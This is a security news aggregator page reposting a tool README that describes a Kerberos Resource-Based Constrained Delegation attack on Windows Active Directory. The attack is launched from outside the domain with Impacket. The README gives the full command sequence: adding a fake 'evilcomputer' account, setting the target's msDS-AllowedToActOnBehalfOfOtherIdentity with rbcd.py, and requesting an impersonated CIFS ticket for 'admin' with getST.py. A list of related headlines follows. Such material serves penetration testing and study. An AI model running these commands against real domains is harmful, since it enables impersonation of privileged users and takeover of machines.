Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ Rbcd-Attack - Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Rbcd-Attack - Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


Abusing Kerberos Resource-Based Constrained Delegation

TL;DR
This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation in a Windows Active Directory Domain.
The difference from other common implementations is that we are launching the attack from outside of the Windows Domain, not from a domain joined (usually Windows) computer.
The attack is implemented using only Python3 Impacket (and its dependencies). Tested on Arch with up-to-date Impacket (0.9.21 as of writing).

The Attack
In summary, without any deep details, the attack targets a domain computer, exactly service principals related to the target domain computer.
What we need here as prerequisites:
  • a domain account with write access to the target computer (exactly write access to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer domain object)
  • permission to create new computer accounts (this is usually default, see MachineAccountQuota)
  • LDAP (389/tcp) and SAMR (445/tcp) (or LDAPS (636/tcp)) access to the DC.
  • Kerberos (88/tcp) access to the DC
The attack path in very high level:
  1. Create a fake computer
  2. Abuse msDS-AllowedToActOnBehalfOfOtherIdentity property of the target
  3. Request impersonated Service Tickets (S4U) for the target computer
Benefit:
  • Impersonated Service Tickets may allow high-level access to services on the target like CIFS, HTTP, etc, if the impersonated account has privileges. Sometimes takeover of the computer.

Common toolsets
The common toolsets for this attack operate on a domain-joined Windows Computer using:

Impacket implementation
This implementation uses pure Impacket from outside the Domain.

Creating the fake computer
Using addcomputer.py example from Impacket let's create a fake computer (called evilcomputer):
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Modifying delegation rights
Implemented the script rbcd.py found here in the repo which adds the related security descriptor of the newly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
The script uses heavily the Python classes in the ntlmrelayx.py Impacket example. For help and an example call the script without options.

Getting the impersonated service ticket
Now everything is ready for abusing the Constrained Delegation by an S4U2Self query and get an impersonated Service Ticket for the target computer. With getST.py Impacket example script:
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
The above command fetches a CIFS Service Ticket on behalf of the targetted domain user admin and stores it in the file admin.ccache.
After adding the file path to the KRB5CCNAME variable the ticket is usable for Kerberos clients.
export KRB5CCNAME=`pwd`/admin.ccache
klist

References
For details about abusing Resource-Based Constrained Delegation:
And one of the most comprehensive presentations about Kerberos Attacks:


...



๐Ÿ“Œ Gone to the Dogs - Windows LPE through the lock screen, NTLM relay, and RBCD


๐Ÿ“ˆ 35.37 Punkte

๐Ÿ“Œ Free "vCISO Clinic" offers Resource-Constrained InfoSec Leaders a Helping Hand


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ vCISO Clinic helps resource-constrained InfoSec leaders


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ [$] Zephyr: a modular OS for resource-constrained devices


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ Malwarebytes Launches ThreatDown to Empower Resource Constrained IT Organizations


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ Training Large-Vocabulary Neural Language Model by Private Federated Learning for Resource-Constrained Devices


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ Resource-constrained Stereo Singing Voice Cancellation


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ Quantized Mistral 7B vs TinyLlama for Resource-Constrained Systems


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ Hackers stole data from US defense org using Impacket, CovalentStealer


๐Ÿ“ˆ 31.11 Punkte

๐Ÿ“Œ Remote Code Execution Using Impacket


๐Ÿ“ˆ 31.11 Punkte

๐Ÿ“Œ Fabian Arrotin: Using connection delegation with mitogen for Ansible


๐Ÿ“ˆ 26.88 Punkte

๐Ÿ“Œ Devious Fun With Impacket - Metasploit Minute


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ Impacket up to 0.9.22 smbserver.py pathname traversal


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ รœberschreiben von Dateien in python-impacket (Fedora)


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ รœberschreiben von Dateien in python-impacket (Fedora)


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ Impacket Offense Basics With an Azure Lab


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ AA22-277A: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ Impacket Cheatsheet For Penetration Testers


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ SharpSecDump - .Net Port Of The Remote SAM + LSA Secrets Dumping Functionality Of Impacket'S Secretsdump.Py


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ Impacket Defense Basics With an Azure Labย 


๐Ÿ“ˆ 26.04 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.0/8.5.1/8.5.2 Outside In Filters unknown vulnerability


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.4.0/8.5.1/8.5.2/8.5.3 Outside In Filters information disclosure


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.4.0/8.5.1/8.5.2/8.5.3 Outside In Filters GetTxObj PRZ File memory corruption


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.4.0/8.5.1/8.5.2/8.5.3 Outside In Filters VwStreamRead SDW File memory corruption


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.2/8.5.3 Outside In Filters denial of service


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.2/8.5.3 Outside In Filters Use-After-Free memory corruption


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.3.0 Outside In Filters denial of service


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.3.0 Outside In Filters denial of service


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.3.0 Outside In Filters denial of service


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.3 Outside In Filters denial of service


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.3 Outside In Filters denial of service


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.3 Outside In Image Export SDK denial of service


๐Ÿ“ˆ 24.11 Punkte

๐Ÿ“Œ Oracle Outside In Technology 8.5.3 Outside In Filters denial of service


๐Ÿ“ˆ 24.11 Punkte











matomo